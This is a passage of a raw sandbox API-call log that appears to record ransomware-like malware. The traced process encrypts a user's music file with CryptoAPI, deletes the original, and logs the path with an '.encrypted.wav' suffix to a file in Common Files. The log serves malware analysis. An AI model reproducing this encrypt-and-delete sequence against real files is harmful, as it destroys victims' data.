hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0039.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.171] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x112e1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x112f0) returned 1 [0039.171] CharLowerBuffW (in: lpsz="byte[70385]", cchLength=0xb | out: lpsz="byte[70385]") returned 0xb [0039.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.172] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9462f8*, pdwDataLen=0x6ae220*=0x112e1, dwBufLen=0x112f0 | out: pbData=0x9462f8*, pdwDataLen=0x6ae220*=0x112f0) returned 1 [0039.173] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.180] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.180] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.180] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.181] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0039.181] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.181] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.182] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.182] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0039.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.182] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0039.182] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0039.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa57f2460, ftCreationTime.dwHighDateTime=0x1d5bd3f, ftLastAccessTime.dwLowDateTime=0x5a013ad0, ftLastAccessTime.dwHighDateTime=0x1d5b77e, ftLastWriteTime.dwLowDateTime=0x5a013ad0, ftLastWriteTime.dwHighDateTime=0x1d5b77e, nFileSizeHigh=0x0, nFileSizeLow=0x112e1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="wiOEx9T.wav", cAlternateFileName="")) returned 0x7c2240 [0039.183] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.183] CharLowerBuffW (in: lpsz="byte[70369]", cchLength=0xb | out: lpsz="byte[70369]") returned 0xb [0039.183] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.183] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.183] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.183] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.184] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.184] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.184] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\wioex9t.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0039.185] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.185] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.185] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.186] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.186] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.186] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.186] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", lpFilePart=0x0) returned 0x41 [0039.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa57f2460, ftCreationTime.dwHighDateTime=0x1d5bd3f, ftLastAccessTime.dwLowDateTime=0x5a013ad0, ftLastAccessTime.dwHighDateTime=0x1d5b77e, ftLastWriteTime.dwLowDateTime=0x17108280, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x112e1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="wiOEx9T.wav", cAlternateFileName="")) returned 0x7c2240 [0039.186] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\wioex9t.wav")) returned 1 [0039.187] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa57f2460, ftCreationTime.dwHighDateTime=0x1d5bd3f, ftLastAccessTime.dwLowDateTime=0x5a013ad0, ftLastAccessTime.dwHighDateTime=0x1d5b77e, ftLastWriteTime.dwLowDateTime=0x17108280, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x112e1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="wiOEx9T.wav", cAlternateFileName="")) returned 0 [0039.187] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.188] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.188] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.188] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.188] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.188] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.188] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.189] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.189] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.189] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.189] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.189] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.189] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.189] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.189] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.189] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2848, lpOverlapped=0x0) returned 1 [0039.189] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.189] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2848, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.189] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.encrypted.wav\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0039.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7f36e0 [0039.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.encrypted.wav\r\n", cchWideChar=78, lpMultiByteStr=0x7f36e0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 78 [0039.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0039.190] WriteFile (in: hFile=0x128, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, 